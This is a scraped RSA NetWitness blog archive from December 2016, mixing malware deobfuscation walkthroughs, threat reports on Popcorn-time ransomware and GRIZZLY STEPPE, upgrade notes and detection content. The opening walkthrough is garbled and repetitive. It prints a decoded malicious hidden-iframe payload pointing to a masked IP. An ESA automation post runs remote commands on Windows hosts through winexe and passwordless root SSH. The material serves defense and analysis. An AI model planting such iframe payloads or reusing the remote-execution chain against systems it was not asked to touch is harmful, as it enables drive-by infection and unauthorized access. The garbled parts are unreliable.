Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2016 > December


1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 

3.Use Firebug to set a breakpoint on the eval (txt); line of the script.

4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab



1.The sample.html file to add the debugger; statement in the beginning of the script

2.load script.html into Firefox using the browser's File 



<html xmlns="" xml:lang="en" lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="" />
<title>...Berlin with the appointed export lotus notes address book of...</title>

var arr =


  • var table = new Array();table['0'] = 0;table['1'] = 1;table['2'] = 2;table['3'] = 3;table['4'] = 4;table['5'] = 5;table['6'] = 6;table['7'] = 7;table['8'] = 8;table['9'] = 9;table['a'] = 10;table['b'] = 11;table['c'] = 12;table['d'] = 13;table['e'] = 14;table['f'] = 15;function markCounter(a) { 

    var txt = ""; var c = 0; 

    while (c < a.length) {txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]); c += 2;} 


    →3. to set a breakpoint on the eval (txt); line of the script.



4.look at contents of the variable "txt"by typingthe console.log(txt) command in Firebug's Console tab.

5.Examine the deobfuscated script in the Console tab




URL, Which is probably malicious.





  1. Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy contents of the variable G82B54 to the clipboard and paste them into Notepad++
  7. Examine the deobfuscated script in Notepad++an d then exit Internet Explorer and the text editor




1.Edit sample.html in Notepad++ to insert the "debugger;" statement in the beginning of its script.





2.Open sample.html in Internet Explorer and activate the debugger in Developer Tools.


3.Reload the script in Internet Explorer to activate the debugger.



4.Set a breakpoint using the Internet Explorer debugger on the third instance of document. write.


5.Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.

6.Copy contents of the variable G82B54 to the clipboard and paste them into Notepad+





7.Examine the deobfuscated script in Notepad++,an d then exit Internet Explorer and the text editor

URL is Malicious Site.

G82B54 "</textarea><iframe src=\http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\ width=1 height=1 style=\"border: 0px\"></iframe>"



Using the Cscript Interpreter


1.Right-click vbscript.vbs and select Edit with Notepad++.A dd the following code in the beginning of the file,
2.redefining the execute function so that instead of executing its argument,


Function execute(x)
End Function





cscript > vbscript.vbs > out.txt

read out.txt



1390***.cn URl is Malicious Site.

Michael Sconzo


Posted by Michael Sconzo Employee Dec 30, 2016

The FirstWatch team is constantly tracking various threats and threat actors. As part of their diligence they monitor 3rd parties for various bulletins and reports. US-Cert recently issued a report detailing an intrusion into a political organization believed to have originated from a Nation-State attacker. This attacker named 'GRIZZLY STEPPE' is the subject of a Joint Analysis Report (JAR) between DHS and DNI. The report can be found here:


Additionally US-CERT has published an intrusion set that contains network indicators of compromise (IOCs) for said attack. RSA has added these indicators into the NetWitness Live platform (via Feeds) the said indicators can be located in NetWitness with the following custom pivot:

threat.source = “third party publicized iocs” && threat.category = “us-cert”


That said, some of the indicators as published are problematic, as they contain legitimate IPs that we believe to be benign triggers. We've identified the following IPs (at the minimum) as potential false positive indicators:



.Edu OWA Server:



Hits to any GRIZZLY STEPPE indicators should warrant additional investigation but hits to the above IP addresses should include the expectation of being false positives. None of these indicators have been removed from the feed since we don't want to alter 3rd party information and cause potentially useful context to be absent. 

I am keenly aware that many of us are carrying lots of baggage due to the myriad of 2016 happenings that threatened free and open societies, but I need you to shake it off and consider the following:


Life is increasingly data dependent, and the Internet is increasingly at risk

First off, it’s a pretty obvious assumption, but life (not just world commerce) is increasingly data dependent. Just how many commercials have you seen where a hipster parent is clicking on their smartphone app to access their home automation setup? Ruling out your need to lock the car doors while away on beach vacation, our daily data addiction is probably better exhibited through our appetite for texting, social media, streaming music, Google, and the many other conveniences of taking the Internet with you. Like it or not, we have rapidly become a connected culture. And while our data reliance seems like a logical progression of technology within our society, so few are aware of the precarious balance. In recent years, the Internet has become a huge enabler of really every market sector… but it’s also become an increasingly more volatile place to operate.


(source: Deloitte[1])


The increasing volatility of the Internet was clearly demonstrated during the second half of 2016 with a wave of critical services outages (e.g., Dyn[2]) and the continued rise of malware. We’ll discuss the Internet of Things (IoT) a bit further on in this post, and for now let’s focus crimeware, where actors ”saturated both the rural and urban U.S. populace with ransomware, and constantly improved their tactics, execution and business model to evade detection by current solutions”[3]. A number of FirstWatch investigations (i.e., previous analysis of Cerber and Locky campaigns) also provide evidence and have documented a growing maturity in the crimeware operating model, specifically detailing best practices ranging from innovative attack vectors and diversified revenue streams to customer service for ‘victim assistance’. These are all part of the recipe that allowed Ransomware to see unprecedented revenues in 2016.


Maybe that’s not enough evidence though… So let’s consider ‘methbot’, a Russian botnet responsible for exploiting online advertising. In this case, actors gamed the Real Time Bidding process (central to how online exchanges auction and place advertising) by forging nearly 600,000 IP address registrations associated with major US internet service providers (ISPs) and creating “more than 250,000 fake web pages with counterfeit inventory from over 6,000 top-line publishers, including The Economist, The Huffington Post, Vogue, ESPN, Fox News and CBS Sports. Methbot generated between 200 and 300 million bogus video ad impressions per day” to fraudulently earn revenue estimated at more than $1 billion[4]. That means that late 2016 crimeware initiatives earned more than the projected GDP for 14 countries[5].


2017 will be the year of crimeware from Eastern Ukraine

So maybe 2016 was just a bad year; how will 2017 see the unprecedented further escalation of crimeware? The answer lies more in the ‘where’… and the answer is Eastern Ukraine. Since the initial invasion in early 2014, Crimea and Eastern Ukraine have been largely under the control of Russian military and Intelligence organizations, and it’s no coincidence that the area has become a hotbed for cyber activity.


easter ukraine russia putin invasion crimeware

Ukraine map as of 18 December 2016[6] (source: BleepingComputer)


Consider the context of ongoing BlackEnergy attacks against Ukrainian power infrastructure and banking[7], which are increasingly suspect of Russian state involvement. It has also been widely reported that Russian GRU (‘Glavnoye razvedyvatel'noye upravleniye’, which translates to Main Intelligence Directorate) was responsible for deploying malware to exploit and gain intelligence from an app commonly used by Ukrainian military forces[8]. Clearly the Russian state is engaged in an active cyber campaign in the region.


But is the increase in crimeware related? During our investigations of summer ransomware attacks, we did note Cerber domains registered to Ukrainian citizens and even to the street address of the Holy Trinity Cathedral in Donetsk; additionally, SKS-Lugan (operating out of Alchevs’k) continues to rise as a in notorious cyber-crime friendly ISP[9]. Both Donetsk and Alchevs’k fall within pro-Russian separatist areas of control in the map above. So… are crimeware actors simply taking advantage of the near bulletproof operating environment that is Eastern Ukraine? Or has Putin connected the dots and begun to directly leverage crimeware to fund his ‘operations’? While it remains unclear, somehow that second idea rings more true each day. Either way, it is likely that we will see continued heightened cyber (and specifically crimeware) operations out of the region in 2017.


My toaster and the Internet of Things is ready to ruin everyone’s day

While the situation in Eastern Ukraine is pretty bleak and the cyber campaigns are certainly going to keep Security Industry folks busy. The real problem is that as if this wasn’t bleak enough, now we have to talk about the Internet of Things (IoT) and why you should be very afraid… First and foremost, let’s all agree the IoT is comprised of all the ‘dumb’ networked devices around our homes and offices (e.g., routers, thermostats, sprinklers, refrigerators, echoes, etc.). Unfortunately, we (society) may have lost our head a bit in the frenzy to field all these flavors of connected devices; apparently security wasn’t a calculated concern.


Evidence to this fact, 2016 witnessed the first major IoT exploit with the simple brilliance of Mirai, its botnet armies, and historically massive distributed denial of service (DDoS) capabilities. The fact that these sleeper botnets exist is disturbing enough, but perhaps even more significant is that Mirai broke the silence about the ‘middle-school-quality’ security of large swathes of the Internet of Things. Despite a frenzy of OEM patching and rapid growth in the emerging IoT security market, our devices are going to be a welcoming attack surface for Mirai and other IoT related campaigns for years to come.


l33t ddos IOT

650Gbps DDoS Attack from Leet Botnet on 21 December 2016[10] (source: Imperva)


If you’re still not making the connection, the vulnerabilities in the IoT effectively mean that everything from our privacy to critical infrastructure[11] to personal safety[12] might be in jeopardy. Now imagine what happens when opportunistic crimeware actors leverage IoT vulnerabilities for a myriad of nefarious purposes… car and TV ransomware[13], over-driven heating system explosions, privacy leaks from Amazon Echoes[14], public transportation outages[15]… the list of the possible goes on and on. Scared yet?


The Bottom Line

Thanks for the lessons in humility 2016. It’s clear that with the plethora of IoT vulnerabilities and the potential for their exploit from bulletproof operating environments (i.e., Eastern Ukraine), 2017 will usher in a new level of threat to our (society’s) ever-increasing data habit.  Now is the time to start shoring up the levies.



RSA FirstWatch banner

















This might help illustrate all the components and levers in place to make Malware/Spectrum function in RSA NetWitness suite.  Some of this is obvious, some of it is not.


Hope it helps anyone that is implementing of thinking of implementing the Malware component for packet traffic.


[Updated] - added legend to call out what is RSA Content and what is opportunities for filtering and customization


The Security Analytics/NetWitness Suite Patch releases can be installed on Service Packs, but not on major releases. For example, can be installed on but not on This also means that the patch release upgrade packages only contain the rpms that are needed to upgrade from the nearest service packs.

If the latest patch was not applied to all appliances at the same time, you need to use a workaround to update them.



  • SA server, Log Collector, and Concentrator have been built from the 10.6.0 OVA.
  • Connection to Live Update Repository was turned off.
  • SA Server and Log Collector were upgraded to 10.6.1 by using the split zip packages (7 zip files). But the Concentrator was left as


Case 1

The 10.6.1 upgrade package was removed from the local repo (SA UI -> Systems -> Updates -> Settings -> Manage Repository. Select and remove 10.6.1).

Now the packages (5 zip files) were uploaded.


SA Server and LC can be upgraded to But Concentrator only sees as a possible upgrade.



1. Load 10.6.1 so that there will be both 10.6.1 and in the local repo.

2. Log into the Concentrator console.

3. Copy the /etc/yum.repos.d/RSASoftware.repo file and create the temp.repo file under the same location. In the temp.repo file, change the last section of the baseurl with the actual release number to 10.6.1 (SA server's local repo folder.)



4. From a command prompt, run “yum clean all”, followed by “ yum check-update”. At this point, you should be able to see the SA rpms returned.

6. Run “yum update –y

7. After a successful upgrade, delete the temp.repo file.



Case 2

From the end of Case 1 --- After upgrading the SA server to, add a new ESA.



The new ESA was provisioned successfully.
The only update option available to the ESA is but only sees as a possible upgrade.


The same workaround above will work for ESA.


This scenario came from Michael McGillick originally a couple of months ago. I thought that above information is worth sharing.

Thank you Melinda Zelenkov for reviewing this post.

A colleague here at RSA posed an interesting problem so I thought I would share with you how I solved it.


Imagine the following scenario. A windows machine has visited a potentially suspicious website. This is detected by an ESA rule and an incident would be created. Normal SOC procedures say that when such an incident happens the ECAT Agent should be installed on the windows machine so that further analysis can take place. It is a busy day in the SOC and unfortunately there is a long time gap between when the agent is actually installed. Can this actually be automated?


The answer is yes and here is how....


First of all, I have a centos 6 server where I will run the commands from. This is to avoid installing any extra packages on the ESA Server that could potentially cause problems.


On the centos 6 server I have installed the openvas-smb package. This provides the winexe linux command.

This is a tool that allows you to run psexec type commands from a linux machine.


[root@centos6 ~]# yum install wmi
Loaded plugins: fastestmirror, refresh-packagekit
Setting up Install Process
Loading mirror speeds from cached hostfile
* atomic:
* base:
* centosplus:
* contrib:
* epel:
* extras:
* updates:
Package wmi is obsoleted by openvas-smb, trying to install instead
Resolving Dependencies
--> Running transaction check
---> Package openvas-smb.x86_64 will be installed
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: atomic-gnutls3-gnutls for package:
--> Processing Dependency: atomic-glib2-glib2 for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Running transaction check
---> Package atomic-glib2-glib2.x86_64 will be installed
---> Package atomic-gnutls3-gnutls.x86_64 will be installed
--> Processing Dependency: for package:
--> Processing Dependency: for package:
---> Package heimdal-libs.x86_64 0:1.6.0-0.9.20140621gita5adc06.el6 will be installed
--> Running transaction check
---> Package nettle.x86_64 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size
openvas-smb x86_64 atomic 3.3 M
Installing for dependencies:
atomic-glib2-glib2 x86_64 atomic 2.2 M
atomic-gnutls3-gnutls x86_64 atomic 610 k
heimdal-libs x86_64 1.6.0-0.9.20140621gita5adc06.el6 epel 1.0 M
nettle x86_64 atomic 307 k

Transaction Summary
Install 5 Package(s)

Total download size: 7.4 M
Installed size: 28 M
Is this ok [y/N]: y
Downloading Packages:
(1/5): | 2.2 MB 00:02
(2/5): | 610 kB 00:00
(3/5): heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64.rpm | 1.0 MB 00:01
(4/5): | 307 kB 00:00
(5/5): | 3.3 MB 00:01
Total 1.1 MB/s | 7.4 MB 00:06
Running rpm_check_debug
Running Transaction Test
Transaction Test Succeeded
Running Transaction
Warning: RPMDB altered outside of yum.
Installing : 1/5
Installing : heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64 2/5
Installing : 3/5
Installing : 4/5
Installing : 5/5
Verifying : 1/5
Verifying : heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64 2/5
Verifying : 3/5
Verifying : 4/5
Verifying : 5/5


Dependency Installed:
atomic-glib2-glib2.x86_64 atomic-gnutls3-gnutls.x86_64 heimdal-libs.x86_64 0:1.6.0-0.9.20140621gita5adc06.el6



After installing the package I then created a file called credentials.cfg containing the account I would use to run the commands on my windows target machine.




I was then able to run command from my centos 6 server to a windows machine as follows:


root@centos6 ~]# winexe -A credentials.cfg // 'cmd.exe /c echo "hello"'
You have mail in /var/spool/mail/root
[root@centos6 ~]# winexe -A credentials.cfg // 'hostname'


This now gives us the capability of running commands from our Centos 6 machine onto a windows machine.


The next part of the puzzle was to allow the ESA Server to be able to connect to our Centos 6 Server to be able to run commands. We set up passwordless SSH keys to do this. The important thing here is that when scripts run on the ESA Server, they are run under the user "notification" so we have to set this up as follows:


SSH onto the ESA Server as root, then type sudo su notification

This switches us to the user notification.


[notification@rsaesa tmp]$ whoami
[notification@rsaesa tmp]$ cd ~
[notification@rsaesa .ssh]$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/notification/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/notification/.ssh/id_rsa.
Your public key has been saved in /home/notification/.ssh/
The key fingerprint is:
d9:ed:61:48:db:c1:aa:75:d5:b7:64:3f:ac:1c:c4:2b notification@rsaesa
The key's randomart image is:
+--[ RSA 2048]----+
| |
| .. . |
| . oo.oo|
| + *.o= +|
| S *E*o +.|
| o +o.o .|
| . .o |
| |
| |
[notification@rsaesa .ssh]$ ssh-copy-id root@centos6.waugh.local
root@centos6.waugh.local's password:
Now try logging into the machine, with "ssh 'root@centos6.waugh.local'", and check in:


to make sure we haven't added extra keys that you weren't expecting.

[notification@rsaesa .ssh]$ ssh root@centos6.waugh.local "winexe -A credentials.cfg // 'hostname'"
[notification@rsaesa .ssh]$ exit


Here we can see that we can run a command on the ESA Server, which will run a command on our Centos 6 Server which will then actually run a command on our target windows machine.


We now define our ESA Rule. My ESA Rule fires whenever a suspiciousIP is detected.



My ESA Script is as follows (Attached as file ESAScript to import into the Global Notifications Page). Note this is python so indentations matter. Please import the file into your system to see the format of the script.


#!/usr/bin/env python
from smtplib import SMTP
import subprocess
import datetime
import json
import sys

def dispatch(alert):
The default dispatch just prints the 'last' alert to /tmp/esa_alert.json. Alert details
are available in the Python hash passed to this method e.g. alert['id'], alert['severity'],
alert['module_name'], alert['events'][0], etc.
These can be used to implement the external integration required.
with open("/tmp/esa_alert.json", mode='w') as alert_file:
alert_file.write(json.dumps(alert, indent=True))

def read():
# Define our metakey tuples
# Each tuple is ["metakey","meta key description, "value"]
metakeys=[ ["device_type","Device Type: ",""], \
["device_ip","Device IP: ",""] , \
["device_class","Device Class: ",""] , \
["ip_src","Source IP: ",""] , \
["ip_dst","Dest IP: ",""] , \
["ip_srcport","Source Port: ",""], \
["ip_dstport","Dest Port: ",""] , \
["ec_activity","Activity: ",""] ,\
["ec_subject","Subject: ",""] ,\
["ec_theme", "Theme: ",""] ,\
["event_description", "Description: ",""] ,\
["event_cat_name","Category: ",""] ,\
["msg_id", "Message ID: ",""] ,\
["event_source_id", "Concentrator: ",""] \

# Keys we want in our Subject
subj_metakeys=[ ["device_type","Device Type: ","" ] , \
["msg_id", "Message ID: ",""] ]

sa_server = ''
brokerid = '6'
smtp_server = ''
smtp_port = '25'
smtp_user = ''
smtp_pass = ''
from_addr = "RSA Security Analytics <>"
to_addr = ['']

# Get data from JSON
esa_alert = json.loads(open('/tmp/esa_alert.json').read())
#Extract Variables (Add as required)

module_name = esa_alert["module_name"]
except KeyError:
module_name = "null"

sessionid = str(esa_alert["events"][0]["sessionid"])
except KeyError:
sessionid = "null"
ip_src = str(esa_alert["events"][0]["ip_src"])
except KeyError:
ip_src = "null"

#Extract Values for each of our Variables
for tuples in metakeys:
tuples[2] = str(esa_alert["events"][0][tuples[0]])
except KeyError:
tuples[2] = "null"

#Extract Our Subject Variables
for tuples in subj_metakeys:
tuples[2] = str(esa_alert["events"][0][tuples[0]])
except KeyError:
tuples[2] = "null"

event_source_id =esa_alert["events"][0]["event_source_id"]
except KeyError:
event_source_id = "null"

#Work out Concentrator ID depending on Event Source
if event_source_id.startswith( "" ):
elif event_source_id.startswith( "" ):
elif event_source_id.startswith( "CONC3" ):
elif event_source_id.startswith( "CONC4" ):

# Sends Email
smtp = SMTP()

# Runs command
mycommand = "ssh root@centos6.waugh.local \"winexe -A credentials.cfg //" + ip_src + " \'hostname\'\""
myresult = ""

# Runs a System Command
p = subprocess.Popen(mycommand,shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
myresult = myresult + line + "\n",
retval = p.wait()

date = "%d/%m/%Y %H:%M" )
subj = ( module_name ) + " :: " + ( date )
for subj_meta in subj_metakeys:
subj += ":: " + ( subj_meta[2])

header = "Use the Investigation tab within Security Analytics to view more details related to this alert.\n\n"
header += ""
header += str( concid )
header += "/navigate/event/DETAILS/"
header += str( sessionid )
header += "\n\n"

message_text = "Alert Name: \t\t%s\n" % ( module_name )
message_text += "Date/Time: \t\t%s\n" % ( date )
message_text += "Command: \t\t%s\n" % ( mycommand )
message_text += "Return Value: \t\t%s\n" % ( retval )
message_text += "Result: \t\t%s\n" % ( myresult )

for tuple in metakeys:
message_text += tuple[1] + "\t\t%s\n" % ( tuple[2] )

body_text= header + message_text
msg = "From: %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s\n" % ( from_addr, to_addr, subj, date, body_text )

smtp.sendmail(from_addr, to_addr, msg)

if __name__ == "__main__":


You can import the rule as follows:


After this, when the ESA Rule is triggered, the command will be run and you will also get an email of the results of the command.


Sample Email Body:




Here what we have achieved is that we run the hostname command on the machine when the ESA Rule triggers.


If you wanted to install ECAT for example we need to be a bit more inventive.


On our centos command server we use the following file 



#Mount the remote machine to copy over ECAT Agent
mount -t cifs //$1/c$ /mnt/temp-mount -o credentials=~/credentials.cfg
#Mount our ECAT source directory where the Agent.exe package lives
mount -t cifs //$/Packages/ECAT /mnt/ecat -o credentials=~/credentials.cfg
cp -rf /mnt/ecat/ecatagent43proxy.exe /mnt/temp-mount/ecatagent43proxy.exe
winexe -A credentials.cfg //$1 'cmd.exe /c "c:\ecatagent43proxy.exe"'
rm /mnt/temp-mount/ecatagent43proxy.exe
umount /mnt/temp-mount


To install ECAT on a remotemachine we would run ./


We now incorporate this into our ECATInstall Script, by replacing the existing command line with:

# Runs command
mycommand = "ssh root@centos6.waugh.local \"./ " + ip_src + "\""


When we ping a suspiciousIP, ECAT then gets installed on the windows machine.

This is a helper report for the lateral movement report pack and alerting capability that was released a while back.


This will query for the eventID's that are required to trip the alerting and reporting that were released, to make it easier to understand if the required data is available for the content that was published.



1 report

8 rules


Imports into Threats - Windows Lateral Movement


Kevin Stear

Popcorn-Time Ransomware

Posted by Kevin Stear Employee Dec 16, 2016

During the week of Dec 12th, FirstWatch took a look at popcorn-time ransomware and its novel approach for a 'viral' attack vector...


Popcorn-time executables function much like other typical ransomware, encrypting important files on a victim's machine and demanding 1BTC payment for a decryption key.  Where popcorn-time deviates from typical ransomware campaigns, is it's attempt to exploit the very worst of human nature...  By that I mean, victims who forward a tor2web proxy link (e.g., https://3hnuhydu4pd247qb[.]onion, aka a popcorn-time download site) to 'friends and family' can receive a free decryption key if two of their 'referrals' are infected and pay the 1BTC ransom.  It's like a bad chain letter; yet, this approach gives popcorn-time a viral component to its attack vector that significantly extends both the longevity and fiduciary return of its campaign.


As part of the effort to evaluate the ransomware's operational infrastructure, we developed a basic yara signature (see figure 1) for popcorn-time and pulled hashes via VirusTotal retrohunt.  


Figure 1: popcorn-time yara signature

popcorntime yara


This signature (admittedly somewhat basic) successfully returns popcorn-time VirusTotal submissions from November and early December, which were observed with typical network callbacks to downloader and malvertising domains.  For example, md5 383c368ae33c530da36ffae0bceec80e was active at the end November and observed with DNS lookups and a TCP connection out to popcorn-time-free[.]net.  It is hypothesized that many of the popcorn-time related domains are 302 redirecting traffic to tor2web download sites for victim infection.  The maltego snapshot below is representative of the campaign's IP and Domain infrastructure (with enrichment from pDNS, certificate and domain registrations, open source intelligence, etc) as it relates to these earlier VirusTotal (VT) submissions. 


Figure 2: popcorn-time infrastructure

some Popcorn Time infrastructure...


During the analysis of this segment of operational infrastructure, we gleaned approximately 300 indicators of compromise (IOCs) that have been pushed into Live under the FirstWatch C2_IPs and C2_DOMAINs (threat.source = 'rsa-firstwatch', threat.category = 'crimeware', and threat.desc = 'popcorn-time').  Although not pictured above, it's worth mentioning that a this infrastrucutre has some times to past Conficker and clickjacker campaigns (e.g., JS/Faceliker deliveries from 1e100[.]net).


In somewhat stark contrast, evidence of popcorn-time's viral component begins to appear in VT submissions during early-to-mid December, where related hashes were observed with absolutely no network connections (e.g.,  It is believed that this second wave of submissions is representative of 'referral' victims, who may have clicked on a tor2web link emailed to them by their once favorite now dirtbag cousin.  


An important note on tor2web proxies, popcorn-time joins recent Cerber and EK campaigns (e.g., Cerber) that increasingly leverage tor services, an obvious step towards obfuscation from security researchers and conventional network defense approaches.  While FirstWatch is aggressively researching capabilities to better mitigate the evolving use of Tor infrastructure in crimeware, the interim recommendation is to block all traffic to and from .TOR and .ONION domains.


Thanks for the continued support from Michael Sconzo, Ray Carney, and Rotem Salinas, and a special thanks to MalwareHunterTeam @malwrhunterteam for all the DMs.



RSA FirstWatch banner

Per request from external teams, I experimented with the NetWitness Suite/Security Analytics 10.6.2 Upgrade in mixed-mode installation.


Case 1: SA 10.6.2 and a new host in 10.5.2


  • SA server has been upgraded from 10.6.0 to 10.6.2 using the split zip files.
  • Another host (Decoder) has been built from the 10.5.0 OVA and was upgraded to 10.5.2. 


  • SA 10.6.2 - to - Decoder 10.5.2 provisioning was successful.
  • Upgrade to 10.6.2  is available on the HOST screen and the upgrade was successful. 


Case 2: SA 10.6.2 and new host in 10.6.0


  • SA server has been upgraded to 10.6.2 using the split zip files
  • A new host (Concentrator) has been built from the 10.6.0 OVA.


  • SA 10.6.2 - to - Decoder 10.6.0 provisioning was successful.
  • The new 10.6.0 host can be upgraded using rpms in SA's repo. 


Case 3: WLC on Win2K12 and SA 10.6.0 / 10.6.2 setups


  • WLC on Win2K12 and added WLC to 10.6.0 / 10.6.2 setup and tested the functionality of LC and could see all events Concentractor


  • Upgraded to WLC -> 10.6.2 on WIN2K12 and noticed that NwLogCollector Service crash post upgrade(ASCO-27227).

PEM file issue

If you are upgrading from a new 10.6.0.x systems (from a 10.6.0 image) to 10.6.2 for the first time and you are using SMCUpdate, you must run the following command to create a PEM file.

/# touch /etc/pki/CA/certs/RSACorpCAv2.pem

This workaround has been noted in the 10.6.1 Update Instructions (page 15, Task 8) but not in the 10.6.2 Update Instructions. 

This isn't an issue if you are using 10.6.2 upgrade zip files.

The issue won't be fixed until the next image is released.


Note: Background image is Lake Assal is Djibouti. I'm dreaming of a sunny and warm place...

Working with Microsoft EventIDs ? ever use the excellent site Ultimate Windows Security to track down eventIDs ?


Here is a context menu to enable right click actions from the metakey to pivot into the website for security events.  Helps reduce the select , ctrl+c, alt+tab, ctrl+v.


administration > system > context menu


    "displayName": "[MS EventID Lookup]",
    "cssClasses": [
    "description": "",
    "type": "UAP.common.contextmenu.actions.URLContextAction",
    "version": "1",
    "modules": [
    "local": "false",
    "groupName": "externalLookupGroup",
    "urlFormat": "{0}",
    "disabled": "",
    "id": "MSEventIDLookup",
    "moduleClasses": [
    "openInNewTab": "true",
    "order": ""

Recently I had a customer who was unable to remove their Application rules from a packet decoder as part of removing the old IR 3.5 content.


If they tried to remove all the IR content rules at one time after they hit Apply the first time on the review screen where it would show what was being removed and what was to remain after the Apply button was not active.


If they tried to remove only a few rules at a time the Apply button on the review screen was active however upon reloading the Application rule tab all the deleted rules were back again.


To resolve the issue I made a backup of their Application rules and then navigated to the Explorer view of the packet decoder.


WARNING: This is a destructive clearing of all Application rules on the decoder. You will only want to do this if you are experiencing this issue or something similar. Make sure you have a back up copy of your current rule set.



Right click on application and click on Properties.



Select clear from the dropdown and then press send in the right hand corner of the Properties screen. You will see a success message in the information box. 

Michael Sconzo

Content Update

Posted by Michael Sconzo Employee Dec 14, 2016

Here's the latest in Content Updates. They enable expanded malware detection as well as add additional features for DNS traffic analysis and analysis around domains.


Application Rule Updates

  • Dyzap - Related Blog post
  • Update of Cerber Ransomware rule


ESA Rule Updates

  • Update of Cerber Ransomware rule


Feed Updates


Parser Updates

  • DNS_lua
    • File detection in DNS traffic
    • Base64 and Base36 TXT record detection
  • TLD_lua options file
    • Ability to set local domains and TLDs for identification to whitelist the domains/TLDs from the logic that looks for suspicious domain structure.

[This content is now available OOTB from RSA Live]

Comment below have the links to locate information about the content


Based on some documents and blog posts that I ran across, these charts and rules were created to alert/display security relevant events from RSA SecurID/ Authentication Manager 8.2+.  The reporting and charting is not intended to replace the built in logging for for user events but more of an early warning system to detect potential critical security events that SOC should be aware of.


As always, test and post comments with suggestions or improvements.


1 Dashboard

8 charts

16 rules

1 list


All import under the same folder structure

RE > Log > SecurID


RSAACESRV parser is required to be installed and enabled on log decoders


Syslog log transfer was what was configured in my testing environment


Changes to the OOTB index will be required to index the result metakey.

Included the table-map-custom and index-concentrator-custom changes that will be required


Has not been tested with 7.x or earlier versions of 8.x (8.0/8.1).


ISR is a password stealer that has been spreading through phishing attacks. The malware targets different browsers and programs in order to steal the victim passwords. In this blog post we will discuss how to detect ISR traffic using RSA NetWitness.


ISR uploads the stolen data to compromised websites as shown in the screenshot below



The unique user-agent string used in this HTTP GET request is common among ISR variants:



Assuming the appropriate meta keys are enabled, the following query can be used to detect ISR network activity:

            service = 80 && client = ‘HardCore Software For : Public’


More information about ISR can be found on Intel Security blog. Scan results for an ISR binary can be found here.


All the IOCs from those sessions were added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

To find those IOCs using RSA NetWitness, please refer to this post.

Recently, RSA completed and certified a new threat intelligence partnership with Symantec as part of our RSA Ready program.  This partnership provides the opportunity to leverage Symantec DeepSight Intelligence with the RSA NetWitness Suite platform.  


This new certified partner can be utilized by the RSA NetWitness Suite to offer security analysts real-time context about an investigation so they can more quickly detect and respond to an incident.


For a detailed description about how to integrate Symantec DeepSight Intelligence into the RSA NetWitness Suite refer to the online integration documentation found here.


Also, for additional details and resources, please refer to the RSA Ready Partner Program

[Updated with a 4th use case around NTLM failed authentications with unusual failure codes (result.code) ]


After seeing a few recent Twitter conversations regarding Kerberos Odd Events I decided to see who NetWitness would see those events and potentially report and chart them.


This is the output of a few web pages and twitter post ideas.  Please test these out in your environment and let me know if there are any improvements or additional filtering that can be done to improve the fidelity of the output. 


I don't have a full domain to test with so my data set is limited and there are probably improvements that can be made.


Three Four areas that were looked at were:

  • Kerberos Ticket Encryption Types
  • Odd Kerberos Failure codes
  • Kerberos Target Domains
  • Odd NTLM Failure codes


The included report can be run to give you ideas where the information came from and potentially other items to look for in the dataset (apparently ::ffff is a legitemate failure and could be filtered from the Ticket Encryption types) and there were potential ways to detect Golden/Silver tickets as well as Mimikatz with the Target Domain (but i have yet to validate those).


Included are:

  • Dashboard (1)
  • Charts (4)
  • Report (1)
  • Rules (4)
  • List(2)

The List can be used to help focus the Odd Kerberos Fail codes if required)

All import into the same folder structure

Log -> Windows


As always, test and let me know if this provides value and helps bring visibility to a part of your network that is important.


The new Investigation Data Model ( and Hunting Pack ( with the associated Hunting Guide ( provide a new way for analysts to interact with their data and hunt for threats. The attached PDF provides a summary of the key points, and what changes you need to make to your RSA NetWitness deployment to make the most of the new content. Happy Hunting!

EDIT 20161214: Fixed a typo on page 21. Thanks Jim!

Filter Blog

By date: By tag: